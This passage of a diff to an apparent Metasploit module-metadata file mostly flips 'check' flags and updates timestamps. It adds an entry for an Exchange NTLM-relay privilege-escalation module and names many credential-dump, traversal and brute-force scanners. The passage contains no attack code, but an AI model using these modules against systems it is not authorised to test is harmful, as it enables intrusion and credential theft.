     "path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dlink_dir_300_615_http_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22944,7 +23324,7 @@
     "path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dlink_dir_615h_http_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22991,7 +23371,7 @@
     "path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dlink_dir_session_cgi_http_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -23039,7 +23419,7 @@
     "path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dlink_user_agent_backdoor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23088,7 +23468,7 @@
     "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dnalims_file_retrieve",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23134,7 +23514,7 @@
     "path": "/modules/auxiliary/scanner/http/docker_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/docker_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23180,7 +23560,7 @@
     "path": "/modules/auxiliary/scanner/http/dolibarr_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dolibarr_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -23274,7 +23654,7 @@
     "path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ektron_cms400net",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -23319,7 +23699,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2019-10-28 03:24:20 +0000",
     "path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/elasticsearch_traversal",
@@ -23406,7 +23786,7 @@
     "path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/epmp1000_dump_config",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -23453,7 +23833,7 @@
     "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/epmp1000_dump_hashes",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -23500,7 +23880,7 @@
     "path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/epmp1000_get_chart_cmd_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -23547,7 +23927,7 @@
     "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/epmp1000_ping_cmd_exec",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -23594,7 +23974,7 @@
     "path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/epmp1000_reset_pass",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -23640,7 +24020,7 @@
     "path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/epmp1000_web_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -23686,7 +24066,7 @@
     "path": "/modules/auxiliary/scanner/http/error_sql_injection.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/error_sql_injection",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23738,7 +24118,7 @@
     "path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/es_file_explorer_open_port",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23784,7 +24164,55 @@
     "path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/etherpad_duo_login",
-    "check": true,
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/http/exchange_web_server_pushsubscription": {
+    "name": "Microsoft Exchange Privilege Escalation Exploit",
+    "fullname": "auxiliary/scanner/http/exchange_web_server_pushsubscription",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-01-21",
+    "type": "auxiliary",
+    "author": [
+      "_dirkjan",
+      "Petros Koutroumpis"
+    ],
+    "description": "This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724\n        Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.\n        This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.\n        The module is based on the work by @_dirkjan,",
+    "references": [
+      "CVE-2019-0724",
+      "URL-https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-10-15 15:43:55 +0000",
+    "path": "/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/exchange_web_server_pushsubscription",
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -23832,7 +24260,7 @@
     "path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/f5_bigip_virtual_server",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23880,7 +24308,7 @@
     "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/f5_mgmt_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23926,7 +24354,7 @@
     "path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/file_same_name_dir",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -23972,7 +24400,7 @@
     "path": "/modules/auxiliary/scanner/http/files_dir.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/files_dir",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24018,7 +24446,7 @@
     "path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/fortinet_ssl_vpn",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -24067,7 +24495,7 @@
     "path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/frontpage_credential_dump",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24114,7 +24542,7 @@
     "path": "/modules/auxiliary/scanner/http/frontpage_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/frontpage_login",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24160,7 +24588,7 @@
     "path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/gavazzi_em_login_loot",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -24207,7 +24635,7 @@
     "path": "/modules/auxiliary/scanner/http/git_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/git_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24253,7 +24681,7 @@
     "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/gitlab_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -24299,7 +24727,7 @@
     "path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/gitlab_user_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24347,7 +24775,7 @@
     "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/glassfish_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -24396,7 +24824,7 @@
     "path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/glassfish_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24444,7 +24872,7 @@
     "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/goahead_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24494,7 +24922,7 @@
     "path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/groupwise_agents_http_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24538,11 +24966,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-22 15:09:08 +0000",
     "path": "/modules/auxiliary/scanner/http/host_header_injection.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/host_header_injection",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24592,7 +25020,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_imc_bims_downloadservlet_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24642,7 +25070,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_imc_faultdownloadservlet_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24692,7 +25120,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_imc_ictdownloadservlet_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24742,7 +25170,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_imc_reportimgservlt_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24792,7 +25220,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_imc_som_file_download",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24841,7 +25269,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24890,7 +25318,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24939,7 +25367,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -24985,7 +25413,7 @@
     "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/hp_sys_mgmt_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -25029,11 +25457,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/auxiliary/scanner/http/http_header.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_header",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25079,7 +25507,7 @@
     "path": "/modules/auxiliary/scanner/http/http_hsts.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_hsts",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25127,7 +25555,7 @@
     "path": "/modules/auxiliary/scanner/http/http_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -25175,7 +25603,7 @@
     "path": "/modules/auxiliary/scanner/http/http_put.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_put",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25272,7 +25700,7 @@
     "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25318,7 +25746,7 @@
     "path": "/modules/auxiliary/scanner/http/http_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/http_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25355,7 +25783,7 @@
     "path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/httpbl_lookup",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25423,7 +25851,9 @@
     ],
     "description": "Collect any leaked internal IPs by requesting commonly redirected locations from IIS.",
     "references": [
-
+      "CVE-2000-0649",
+      "BID-1499",
+      "EDB-20096"
     ],
     "platform": "",
     "arch": "",
@@ -25444,11 +25874,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-12-08 16:15:48 +0000",
     "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/iis_internal_ip",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25470,7 +25900,7 @@
       "MinatoTW <shaks19jais@gmail.com>",
       "egre55 <ianaustin@protonmail.com>"
     ],
-    "description": "The vulnerability is caused by a tilde character \"~\" in a GET or OPTIONS request, which\n         could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili\n         and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in\n         2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.",
+    "description": "The vulnerability is caused by a tilde character \"~\" in a GET or OPTIONS request, which\n         could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili\n         and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in\n         2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.",
     "references": [
       "URL-https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability",
       "URL-https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability"
@@ -25494,7 +25924,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2019-09-23 15:29:38 +0000",
+    "mod_time": "2019-10-03 12:28:54 +0000",
     "path": "/modules/auxiliary/scanner/http/iis_shortname_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/iis_shortname_scanner",
@@ -25592,7 +26022,7 @@
     "path": "/modules/auxiliary/scanner/http/infovista_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/infovista_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -25640,7 +26070,7 @@
     "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/intel_amt_digest_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25686,7 +26116,7 @@
     "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ipboard_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -25736,7 +26166,7 @@
     "path": "/modules/auxiliary/scanner/http/jboss_status.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jboss_status",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25787,7 +26217,7 @@
     "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jboss_vulnscan",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25837,7 +26267,7 @@
     "path": "/modules/auxiliary/scanner/http/jenkins_command.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jenkins_command",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25883,7 +26313,7 @@
     "path": "/modules/auxiliary/scanner/http/jenkins_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jenkins_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -25930,7 +26360,7 @@
     "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/jenkins_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -25976,7 +26406,7 @@
     "path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/joomla_bruteforce_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -26022,7 +26452,7 @@
     "path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/joomla_ecommercewd_sqli_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26069,7 +26499,7 @@
     "path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/joomla_gallerywd_sqli_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26115,7 +26545,7 @@
     "path": "/modules/auxiliary/scanner/http/joomla_pages.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/joomla_pages",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26161,7 +26591,7 @@
     "path": "/modules/auxiliary/scanner/http/joomla_plugins.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/joomla_plugins",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26207,7 +26637,7 @@
     "path": "/modules/auxiliary/scanner/http/joomla_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/joomla_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26254,7 +26684,7 @@
     "path": "/modules/auxiliary/scanner/http/kodi_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/kodi_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26301,7 +26731,7 @@
     "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/linknat_vos_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26351,7 +26781,7 @@
     "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/linksys_e1500_traversal",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -26401,7 +26831,7 @@
     "path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/litespeed_source_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26447,7 +26877,7 @@
     "path": "/modules/auxiliary/scanner/http/lucky_punch.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/lucky_punch",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26497,7 +26927,7 @@
     "path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/majordomo2_directory_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26543,7 +26973,7 @@
     "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/manageengine_desktop_central_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -26590,7 +27020,7 @@
     "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/manageengine_deviceexpert_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26639,7 +27069,7 @@
     "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26687,7 +27117,7 @@
     "path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/manageengine_securitymanager_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26737,7 +27167,7 @@
     "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/mediawiki_svg_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26785,7 +27215,7 @@
     "path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/meteocontrol_weblog_extractadmin",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26831,7 +27261,7 @@
     "path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/mod_negotiation_brute",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26877,7 +27307,7 @@
     "path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/mod_negotiation_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -26928,7 +27358,7 @@
     "path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ms09_020_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27028,7 +27458,7 @@
     "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/mybook_live_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -27077,7 +27507,7 @@
     "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/netdecision_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27126,7 +27556,7 @@
     "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/netgear_sph200d_traversal",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -27176,7 +27606,7 @@
     "path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/nginx_source_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27223,7 +27653,7 @@
     "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27271,7 +27701,7 @@
     "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27320,7 +27750,7 @@
     "path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/novell_mdm_creds",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27366,7 +27796,7 @@
     "path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/ntlm_info_enumeration",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27412,7 +27842,7 @@
     "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/octopusdeploy_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -27449,7 +27879,7 @@
     "path": "/modules/auxiliary/scanner/http/onion_omega2_login.py",
     "is_install_path": true,
     "ref_name": "scanner/http/onion_omega2_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -27496,7 +27926,7 @@
     "path": "/modules/auxiliary/scanner/http/open_proxy.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/open_proxy",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27542,7 +27972,7 @@
     "path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/openmind_messageos_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -27593,7 +28023,7 @@
     "path": "/modules/auxiliary/scanner/http/options.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/options",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27642,7 +28072,7 @@
     "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27691,7 +28121,7 @@
     "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/oracle_demantra_file_retrieval",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27737,7 +28167,7 @@
     "path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/oracle_ilom_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -27774,7 +28204,7 @@
     "path": "/modules/auxiliary/scanner/http/owa_ews_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/owa_ews_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -27820,7 +28250,7 @@
     "path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/owa_iis_internal_ip",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -27874,7 +28304,7 @@
     "path": "/modules/auxiliary/scanner/http/owa_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/owa_login",
-    "check": true,
